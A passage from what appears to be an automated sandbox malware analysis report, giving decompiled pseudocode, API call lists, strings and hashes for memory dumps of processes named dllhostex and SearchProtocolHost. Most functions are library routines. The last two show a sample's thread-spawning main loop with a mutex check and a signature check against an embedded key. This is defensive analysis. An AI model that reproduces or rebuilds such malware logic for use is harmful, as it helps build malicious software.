                                                						if(_t132 != 0) {
                                                							_t167 = ((_a28 ^ 0x00000001) << 5) + 0x50;
                                                							__eflags = _t167;
                                                							 *_t132 = _t167;
                                                							 *((char*)(_t132 + 3)) = 0;
                                                						}
                                                						_t183 = 0;
                                                					} else {
                                                						 *_t185 = 0;
                                                					}
                                                					goto L65;
                                                				}
                                                				_t133 = E0135EB5C();
                                                				_t183 = 0x22;
                                                				 *_t133 = _t183;
                                                				E0135B7A1();
                                                				goto L65;
                                                			}

                                                0x01366233
                                                0x01366234
                                                0x01366235
                                                0x0136623d
                                                0x0136623d
                                                0x0136623f
                                                0x0136623f
                                                0x01366242
                                                0x01366245
                                                0x01366248
                                                0x0136624a
                                                0x0136624c
                                                0x0136624c
                                                0x01366259
                                                0x01366260
                                                0x01366267
                                                0x01366269
                                                0x01366272
                                                0x01366272
                                                0x01366275
                                                0x01366277
                                                0x0136627a
                                                0x0136627d
                                                0x01366289
                                                0x01366289
                                                0x0136628d
                                                0x01366290
                                                0x01366292
                                                0x00000000
                                                0x0136627f
                                                0x0136627f
                                                0x01366285
                                                0x01366285
                                                0x01366293
                                                0x01366293
                                                0x01366296
                                                0x0136629a
                                                0x0136629b
                                                0x0136629d
                                                0x0136629f
                                                0x013662a1
                                                0x013662ca
                                                0x013662ca
                                                0x013662cc
                                                0x013662d9
                                                0x013662d9
                                                0x013662da
                                                0x013662db
                                                0x013662dd
                                                0x013662df
                                                0x013662e4
                                                0x013662e6
                                                0x013662e9
                                                0x013662ec
                                                0x013662ef
                                                0x013662f1
                                                0x013662f2
                                                0x013662f2
                                                0x013662f4
                                                0x013662f4
                                                0x013662f6
                                                0x01366303
                                                0x01366303
                                                0x01366304
                                                0x01366305
                                                0x01366307
                                                0x01366308
                                                0x01366309
                                                0x01366311
                                                0x01366314
                                                0x01366316
                                                0x01366317
                                                0x01366317
                                                0x01366319
                                                0x01366319
                                                0x01366319
                                                0x0136631c
                                                0x0136631e
                                                0x01366321
                                                0x01366323
                                                0x01366329
                                                0x0136632e
                                                0x0136632e
                                                0x0136633b
                                                0x0136633b
                                                0x013662f8
                                                0x013662fa
                                                0x00000000
                                                0x00000000
                                                0x013662fc
                                                0x00000000
                                                0x00000000
                                                0x013662fe
                                                0x01366301
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01366301
                                                0x013662ce
                                                0x013662d0
                                                0x00000000
                                                0x00000000
                                                0x013662d2
                                                0x00000000
                                                0x00000000
                                                0x013662d4
                                                0x013662d7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x013662d7
                                                0x013662a3
                                                0x013662a8
                                                0x013662ae
                                                0x013662ae
                                                0x013662af
                                                0x013662b0
                                                0x013662b1
                                                0x013662b3
                                                0x013662b8
                                                0x013662ba
                                                0x013662bb
                                                0x013662c0
                                                0x013662c3
                                                0x013662c5
                                                0x013662c8
                                                0x013662c8
                                                0x00000000
                                                0x013662c8
                                                0x013662aa
                                                0x013662ac
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x013662ac
                                                0x01366281
                                                0x01366283
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01366283
                                                0x0136627d
                                                0x00000000
                                                0x0136615f
                                                0x0136615b
                                                0x01366110
                                                0x0136611c
                                                0x0136611c
                                                0x0136611e
                                                0x01366125
                                                0x00000000
                                                0x01366125
                                                0x01366120
                                                0x00000000
                                                0x01366120
                                                0x013660d3
                                                0x013660d9
                                                0x013660d9
                                                0x013660dc
                                                0x013660dc
                                                0x013660dd
                                                0x00000000
                                                0x013660dd
                                                0x013660d5
                                                0x013660d7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x013660d7
                                                0x01366095
                                                0x0136609a
                                                0x0136609c
                                                0x013660a9
                                                0x013660b0
                                                0x013660b2
                                                0x013660bd
                                                0x013660bd
                                                0x013660c0
                                                0x013660c2
                                                0x013660c2
                                                0x013660c6
                                                0x0136609e
                                                0x0136609e
                                                0x0136609e
                                                0x00000000
                                                0x0136609c
                                                0x01366050
                                                0x01366057
                                                0x01366058
                                                0x0136605a
                                                0x00000000

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _strrchr
                                                • String ID:
                                                • API String ID: 3213747228-0
                                                • Opcode ID: e3ea8d8bb984ed6d9e42cdb06ef0b2b72a25c3cc5b87a9fa46dcaf8266aadd7e
                                                • Instruction ID: b4c1ec5b831158735fbe3a5a050cf1ad60b592a64321f24001e9c2d3b7f6595c
                                                • Opcode Fuzzy Hash: e3ea8d8bb984ed6d9e42cdb06ef0b2b72a25c3cc5b87a9fa46dcaf8266aadd7e
                                                • Instruction Fuzzy Hash: D1B155B19042469FEB21CF2CC8527BEBFFDEF45298F1481AAD845DB246D6389901CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 29%
                                                			E0134DDC0(void* __ecx) {
                                                				intOrPtr _v4;
                                                				intOrPtr _v12;
                                                				intOrPtr _v16;
                                                				intOrPtr _t39;
                                                				intOrPtr _t41;
                                                				intOrPtr _t42;
                                                				intOrPtr _t56;
                                                				intOrPtr _t57;
                                                				intOrPtr _t59;
                                                				intOrPtr _t60;
                                                				intOrPtr _t66;
                                                				void* _t69;
                                                				intOrPtr _t70;
                                                				intOrPtr _t71;
                                                				void* _t81;
                                                				void* _t83;
                                                				void* _t85;
                                                
                                                				_t69 = __ecx;
                                                				_t70 =  *((intOrPtr*)(__ecx + 0x1c));
                                                				_t39 =  *((intOrPtr*)(_t70 + 0xc));
                                                				_v4 = _t39;
                                                				if(_t39 == 0) {
                                                					L23:
                                                					return 1;
                                                				} else {
                                                					_t59 =  *((intOrPtr*)(_t70 + 0x38));
                                                					_t66 =  *((intOrPtr*)(_t70 + 0x3c));
                                                					if(_t59 != 0 || _t66 != 0) {
                                                						_t56 =  *((intOrPtr*)(_t69 + 0x78));
                                                						_t71 =  *((intOrPtr*)(_t69 + 0x7c));
                                                						if(_t56 != _t59 || _t71 != _t66) {
                                                							_t41 =  *((intOrPtr*)(_t70 + 0x40));
                                                							_t81 =  *((intOrPtr*)(_t70 + 0x44)) - _t71;
                                                							if(_t81 > 0 || _t81 >= 0 && _t41 > _t56) {
                                                								L11:
                                                								_t42 =  *((intOrPtr*)(_t70 + 0x54));
                                                								_t60 = _t59 - _t56;
                                                								_v16 = 0;
                                                								asm("sbb edx, ebp");
                                                								_t85 = _v16 - _t66;
                                                								if(_t85 > 0 || _t85 >= 0 && _t42 >= _t60) {
                                                									_t42 = _t60;
                                                									_v12 = _t66;
                                                								} else {
                                                									_v12 = _v16;
                                                								}
                                                								_t57 = _v4( *((intOrPtr*)(_t70 + 8)), _t56, _t71,  *((intOrPtr*)(_t70 + 4)), _t42);
                                                								if(_t57 == 0xffffffff || _t57 == 0xfffffffe) {
                                                									 *((intOrPtr*)(_t70 + 0x38)) =  *((intOrPtr*)(_t69 + 0x78));
                                                									 *((intOrPtr*)(_t70 + 0x3c)) =  *((intOrPtr*)(_t69 + 0x7c));
                                                									_t37 = _t70 + 0x1c; // 0x1c
                                                									LeaveCriticalSection(_t37);
                                                									if(_t57 != 0xffffffff) {
                                                										_push("Closing connection (application reported error generating data)\n");
                                                										_push( *((intOrPtr*)(_t69 + 0x10)));
                                                										E01351E90();
                                                										E0134DD20(_t69, 1);
                                                										return 0;
                                                									} else {
                                                										E0134DD20(_t69, 0);
                                                										return 0;
                                                									}
                                                								} else {
                                                									 *((intOrPtr*)(_t70 + 0x40)) =  *((intOrPtr*)(_t69 + 0x78));
                                                									 *((intOrPtr*)(_t70 + 0x44)) =  *((intOrPtr*)(_t69 + 0x7c));
                                                									 *((intOrPtr*)(_t70 + 0x50)) = _t57;
                                                									if(_t57 != 0) {
                                                										goto L23;
                                                									} else {
                                                										_t31 = _t70 + 0x1c; // 0x1c
                                                										 *((intOrPtr*)(_t69 + 0xac)) = 0xd;
                                                										LeaveCriticalSection(_t31);
                                                										return 0;
                                                									}
                                                								}
                                                							} else {
                                                								_v16 =  *((intOrPtr*)(_t70 + 0x50));
                                                								_v16 = _v16 +  *((intOrPtr*)(_t70 + 0x40));
                                                								_t71 =  *((intOrPtr*)(_t69 + 0x7c));
                                                								asm("adc eax, [esi+0x44]");
                                                								_t83 = 0 - _t71;
                                                								if(_t83 > 0 || _t83 >= 0 && _v16 > _t56) {
                                                									goto L23;
                                                								} else {
                                                									goto L11;
                                                								}
                                                							}
                                                						} else {
                                                							goto L23;
                                                						}
                                                					} else {
                                                						goto L23;
                                                					}
                                                				}
                                                			}





















                                                APIs
                                                • LeaveCriticalSection.KERNEL32(0000001C,?,?,?,?,?,?,?,?,013506D7), ref: 0134DE9F
                                                • LeaveCriticalSection.KERNEL32(0000001C,?,?,?,?,?,?,?,?,013506D7), ref: 0134DEBF
                                                  • Part of subcall function 0134DD20: shutdown.WS2_32(?,00000001), ref: 0134DD56
                                                Strings
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\connection.c, xrefs: 0134DDC4
                                                • Closing connection (application reported error generating data), xrefs: 0134DEDD
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalLeaveSection$shutdown
                                                • String ID: Closing connection (application reported error generating data)$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\connection.c
                                                • API String ID: 1820652927-3461260996
                                                • Opcode ID: d92931d1fece897fe3742935dc6c0d5b3397abf3e6758f96ed7c1cdf4195a501
                                                • Instruction ID: 9afcfa2ed75590c390766b002f4c569fb5f74ffe91589a15a1a0ea261bfbe8f5
                                                • Opcode Fuzzy Hash: d92931d1fece897fe3742935dc6c0d5b3397abf3e6758f96ed7c1cdf4195a501
                                                • Instruction Fuzzy Hash: 1141B0316007068BD735DFADD88052AF7E1FBA4228B44493EE966C3B50D771F8598B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 85%
                                                			E01365E73(void* __ecx) {
                                                				void* __esi;
                                                				intOrPtr _t2;
                                                				void* _t3;
                                                				void* _t13;
                                                				void* _t14;
                                                				void* _t16;
                                                				long _t18;
                                                				void* _t19;
                                                
                                                				_t14 = __ecx;
                                                				_t18 = GetLastError();
                                                				_t2 =  *0x13cc370; // 0x6
                                                				_t22 = _t2 - 0xffffffff;
                                                				if(_t2 == 0xffffffff) {
                                                					L5:
                                                					_t3 = E013672FE(_t14, __eflags, _t2, 0xffffffff);
                                                					__eflags = _t3;
                                                					if(_t3 == 0) {
                                                						goto L3;
                                                					} else {
                                                						_t19 = E01366CCA(_t14, 1, 0x364);
                                                						_pop(_t16);
                                                						__eflags = _t19;
                                                						if(__eflags != 0) {
                                                							__eflags = E013672FE(_t16, __eflags,  *0x13cc370, _t19);
                                                							if(__eflags != 0) {
                                                								E01365B4C(_t19, _t19, 0x13d5274);
                                                								E013656E2(0);
                                                								_t13 = _t19;
                                                							} else {
                                                								_t13 = 0;
                                                								E013672FE(_t16, __eflags,  *0x13cc370, 0);
                                                								_push(_t19);
                                                								goto L8;
                                                							}
                                                						} else {
                                                							_t13 = 0;
                                                							__eflags = 0;
                                                							E013672FE(_t16, 0,  *0x13cc370, 0);
                                                							_push(0);
                                                							L8:
                                                							E013656E2();
                                                						}
                                                					}
                                                				} else {
                                                					_t13 = E013672A8(_t14, _t22, _t2);
                                                					if(_t13 == 0) {
                                                						_t2 =  *0x13cc370; // 0x6
                                                						goto L5;
                                                					} else {
                                                						if(_t13 == 0xffffffff) {
                                                							L3:
                                                							_t13 = 0;
                                                						}
                                                					}
                                                				}
                                                				SetLastError(_t18);
                                                				return _t13;
                                                			}












                                                APIs
                                                • GetLastError.KERNEL32(?,?,4132269F,0135EB61,01365708,?,?,01363C72), ref: 01365E78
                                                • _free.LIBCMT ref: 01365ED3
                                                • _free.LIBCMT ref: 01365F09
                                                • SetLastError.KERNEL32(00000000,00000006,000000FF,?,4132269F,0135EB61,01365708,?,?,01363C72), ref: 01365F14
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast_free
                                                • String ID:
                                                • API String ID: 2283115069-0
                                                • Opcode ID: d80bff7d444c8fff52e6a9c8c174c9227ed18f8907974cb21668d9209e4fca5b
                                                • Instruction ID: af9666a3d42d15238c3edb56cf232d819369b084af1e271b9e698a6a0f6d6c50
                                                • Opcode Fuzzy Hash: d80bff7d444c8fff52e6a9c8c174c9227ed18f8907974cb21668d9209e4fca5b
                                                • Instruction Fuzzy Hash: E801C031A442026EEA3226BCBC8496B3A4C9B566FCB60D235F518961DCDA688C074760
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 50%
                                                			E0134D9F0(void* __eax, intOrPtr* __ecx) {
                                                				intOrPtr* _t9;
                                                				intOrPtr* _t17;
                                                				struct _CRITICAL_SECTION* _t19;
                                                				void* _t23;
                                                
                                                				_t8 = __eax;
                                                				_t17 = __ecx;
                                                				if(__ecx == 0) {
                                                					return __eax;
                                                				} else {
                                                					_t19 = __ecx + 0x1c;
                                                					EnterCriticalSection(_t19);
                                                					_t2 = _t17 + 0x58;
                                                					 *_t2 =  *((intOrPtr*)(_t17 + 0x58)) + 0xffffffff;
                                                					_push(_t19);
                                                					if( *_t2 == 0) {
                                                						LeaveCriticalSection();
                                                						DeleteCriticalSection(_t19);
                                                						_t9 =  *((intOrPtr*)(_t17 + 0x10));
                                                						if(_t9 != 0) {
                                                							 *_t9( *((intOrPtr*)(_t17 + 8)));
                                                							_t23 = _t23 + 4;
                                                						}
                                                						if( *_t17 == 0) {
                                                							L7:
                                                							return E0135C9E5(_t17);
                                                						} else {
                                                							do {
                                                								_t21 =  *_t17;
                                                								 *_t17 =  *((intOrPtr*)( *_t17));
                                                								E0135C9E5( *((intOrPtr*)( *_t17 + 4)));
                                                								E0135C9E5( *((intOrPtr*)(_t21 + 8)));
                                                								E0135C9E5(_t21);
                                                								_t23 = _t23 + 0xc;
                                                							} while ( *_t17 != 0);
                                                							goto L7;
                                                						}
                                                					}
                                                					LeaveCriticalSection();
                                                					return _t8;
                                                				}
                                                			}








                                                APIs
                                                • EnterCriticalSection.KERNEL32(00000000,?,00000000,0134DD6E,00000000,?,?,770EEB70,0134BE74,?,?,770EEB70,0134D37C), ref: 0134D9FC
                                                • LeaveCriticalSection.KERNEL32(00000000), ref: 0134DA09
                                                • LeaveCriticalSection.KERNEL32(00000000), ref: 0134DA12
                                                • DeleteCriticalSection.KERNEL32(00000000), ref: 0134DA19
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$Leave$DeleteEnter
                                                • String ID:
                                                • API String ID: 122283594-0
                                                • Opcode ID: 383108460aa08b68f384c75dee05e7d524f4302620babdfdca2fe0c30e8c9df0
                                                • Instruction ID: 99e53cb288322c24638f839449cf19eb2df635b860ef9c615e8a35deb05e0a44
                                                • Opcode Fuzzy Hash: 383108460aa08b68f384c75dee05e7d524f4302620babdfdca2fe0c30e8c9df0
                                                • Instruction Fuzzy Hash: 9301A931104613DBE7616F5CEC09D99F7B8FF62728F140134E91193554DB35B5A2CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E01371FFA(void* _a4, long _a8, DWORD* _a12) {
                                                				void* _t13;
                                                
                                                				_t13 = WriteConsoleW( *0x13cca40, _a4, _a8, _a12, 0);
                                                				if(_t13 == 0 && GetLastError() == 6) {
                                                					E01371FE3();
                                                					E01371FA5();
                                                					_t13 = WriteConsoleW( *0x13cca40, _a4, _a8, _a12, _t13);
                                                				}
                                                				return _t13;
                                                			}





                                                APIs
                                                • WriteConsoleW.KERNEL32(00000000,0000000D,?,00000000,00000000,?,01369E51,00000000,00000001,00000000,00000000,?,01360290,00000000,?,00000000), ref: 01372011
                                                • GetLastError.KERNEL32(?,01369E51,00000000,00000001,00000000,00000000,?,01360290,00000000,?,00000000,00000000,00000000,?,01360811,?), ref: 0137201D
                                                  • Part of subcall function 01371FE3: CloseHandle.KERNEL32(FFFFFFFE,0137202D,?,01369E51,00000000,00000001,00000000,00000000,?,01360290,00000000,?,00000000,00000000,00000000), ref: 01371FF3
                                                • ___initconout.LIBCMT ref: 0137202D
                                                  • Part of subcall function 01371FA5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,01371FD4,01369E37,00000000,?,01360290,00000000,?,00000000,00000000), ref: 01371FB8
                                                • WriteConsoleW.KERNEL32(00000000,0000000D,?,00000000,?,01369E51,00000000,00000001,00000000,00000000,?,01360290,00000000,?,00000000,00000000), ref: 01372042
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                • String ID:
                                                • API String ID: 2744216297-0
                                                • Opcode ID: 43d7daed4a3d17a48ccc1ee53e0599dd158167ba807e054deef9258c68f8c10c
                                                • Instruction ID: 0827c3f0a4f50e4fbd7185e88a7635928f7d73283198d10cb3bca6c3a4c118ee
                                                • Opcode Fuzzy Hash: 43d7daed4a3d17a48ccc1ee53e0599dd158167ba807e054deef9258c68f8c10c
                                                • Instruction Fuzzy Hash: B8F03036400125BFDF335FDADC0CACA3F2AFB197A1F004020FA1986120C7369821EB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                • Illegal call to MHD_get_timeout, xrefs: 0134B06D
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: Illegal call to MHD_get_timeout
                                                • API String ID: 0-1545223730
                                                • Opcode ID: 6dc4e46d08ec3d7146ec1e4e1010b82244026f16770f0add499ac9fe76251d4d
                                                • Instruction ID: 6c8a2bc5d3d27379f05ae5ec369fef530ec99f5b16b2fa09f62b7548e53fb410
                                                • Opcode Fuzzy Hash: 6dc4e46d08ec3d7146ec1e4e1010b82244026f16770f0add499ac9fe76251d4d
                                                • Instruction Fuzzy Hash: F741A0717002018BEB18DE2CC884769B7E5EB94318F19827DDD589B25ADB73F84A8791
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 100%
                                                			E02FA93E0(void* __eflags) {
                                                				void* _t3;
                                                				long _t15;
                                                
                                                				FreeConsole();
                                                				SetUnhandledExceptionFilter(E02FA9300); // executed
                                                				_t3 = E02FA9310(); // executed
                                                				if(_t3 != 0) {
                                                					Sleep(0xbb8); // executed
                                                					CreateThread(0, 0, E02FAAFC0, 0, 0, 0); // executed
                                                					CreateThread(0, 0, E02FA6D40, 0, 0, 0); // executed
                                                					CreateThread(0, 0, E02FAB470, 0, 0, 0); // executed
                                                					CreateThread(0, 0, E02FA7C20, 0, 0, 0); // executed
                                                					CreateThread(0, 0, E02FA5200, 0, 0, 0); // executed
                                                					_t15 = GetTickCount();
                                                					if(GetTickCount() - _t15 >= 0xa4cb80) {
                                                						L4:
                                                						ExitProcess(0);
                                                					} else {
                                                						goto L3;
                                                					}
                                                					do {
                                                						L3:
                                                						Sleep(0xea60); // executed
                                                					} while (GetTickCount() - _t15 < 0xa4cb80);
                                                					goto L4;
                                                				}
                                                				return 0;
                                                			}






                                                APIs
                                                • FreeConsole.KERNEL32 ref: 02FA93E3
                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00009300), ref: 02FA93EE
                                                  • Part of subcall function 02FA9310: WSAStartup.WS2_32(00000202,?), ref: 02FA9335
                                                  • Part of subcall function 02FA9310: CreateMutexA.KERNELBASE ref: 02FA937F
                                                  • Part of subcall function 02FA9310: GetLastError.KERNEL32 ref: 02FA9387
                                                  • Part of subcall function 02FA9310: ReleaseMutex.KERNEL32(00000000), ref: 02FA939E
                                                  • Part of subcall function 02FA9310: CloseHandle.KERNEL32(00000000), ref: 02FA93A5
                                                • Sleep.KERNELBASE(00000BB8), ref: 02FA940E
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_0000AFC0,00000000,00000000,00000000), ref: 02FA9425
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00006D40,00000000,00000000,00000000), ref: 02FA9436
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_0000B470,00000000,00000000,00000000), ref: 02FA9447
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00007C20,00000000,00000000,00000000), ref: 02FA9458
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005200,00000000,00000000,00000000), ref: 02FA9469
                                                • GetTickCount.KERNEL32 ref: 02FA9471
                                                • GetTickCount.KERNEL32 ref: 02FA9475
                                                • Sleep.KERNELBASE(0000EA60), ref: 02FA9485
                                                • GetTickCount.KERNEL32 ref: 02FA9487
                                                • ExitProcess.KERNEL32 ref: 02FA9494
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: Create$Thread$CountTick$MutexSleep$CloseConsoleErrorExceptionExitFilterFreeHandleLastProcessReleaseStartupUnhandled
                                                • String ID:
                                                • API String ID: 4116069078-0
                                                • Opcode ID: 8e6c873aba6480eb3df2177997116aa5d298d352a12b2eb6df8efaa111300ea0
                                                • Instruction ID: 5606f54a757d2e597707b81b91fc944c2b68a9ff58d9a0c450455ac809545052
                                                • Opcode Fuzzy Hash: 8e6c873aba6480eb3df2177997116aa5d298d352a12b2eb6df8efaa111300ea0
                                                • Instruction Fuzzy Hash: 64111A71BC432876F67026B15D6BF4D6E14AB40FE5F704822F70AFE0C089D0784589AD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 28%
                                                			E02FA4920(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                				char _v8;
                                                				long* _v12;
                                                				long* _v16;
                                                				int _t16;
                                                				int _t18;
                                                				char* _t20;
                                                				intOrPtr _t21;
                                                				void* _t24;
                                                				void* _t27;
                                                				long* _t30;
                                                
                                                				_t16 = CryptAcquireContextA( &_v12, 0, 0, 1, 0xf0000000); // executed
                                                				if(_t16 != 0) {
                                                					_t18 = CryptImportKey(_v12, 0x2fd0ce0, 0x94, 0, 0,  &_v16); // executed
                                                					if(_t18 == 0) {
                                                						goto L1;
                                                					} else {
                                                						_t20 =  &_v8;
                                                						__imp__CryptCreateHash(_v12, 0x8003, 0, 0, _t20); // executed
                                                						if(_t20 == 0) {
                                                							goto L1;
                                                						} else {
                                                							__imp__CryptHashData(_v8, _a4, _a8, 0);
                                                							if(_t20 == 0) {
                                                								goto L1;
                                                							} else {
                                                								__imp__CryptVerifySignatureA(_v8, _a12, _a16, _v16, 0, 0, _t24); // executed
                                                								_t21 = _v8;
                                                								_t27 =  !=  ? 1 : 0;
                                                								if(_t21 != 0) {
                                                									__imp__CryptDestroyHash(_t21);
                                                								}
                                                								_t30 = _v12;
                                                								if(_t30 != 0) {
                                                									CryptReleaseContext(_t30, 0);
                                                								}
                                                								return _t27;
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					L1:
                                                					return 0;
                                                				}
                                                			}














                                                APIs
                                                • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000050,?,?), ref: 02FA4935
                                                • CryptImportKey.ADVAPI32(00000000,02FD0CE0,00000094,00000000,00000000,?), ref: 02FA495A
                                                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 02FA4974
                                                • CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 02FA4989
                                                • CryptVerifySignatureA.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?), ref: 02FA49A6
                                                • CryptDestroyHash.ADVAPI32(?), ref: 02FA49C1
                                                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 02FA49D1
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyImportReleaseSignatureVerify
                                                • String ID:
                                                • API String ID: 949692108-0
                                                • Opcode ID: 5e4b41e264148259177fd840382b71da5d4392294a69fe08938e60b1845534ff
                                                • Instruction ID: e024663cb60d53faf2921e66e951af018ede4afdf125f3b48bfa8768df4b829e
                                                • Opcode Fuzzy Hash: 5e4b41e264148259177fd840382b71da5d4392294a69fe08938e60b1845534ff
                                                • Instruction Fuzzy Hash: CA214275FC0309BBEF208EA0DD15FADBB79BB08B90F600454BB04F60D0D7B1A6249A54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

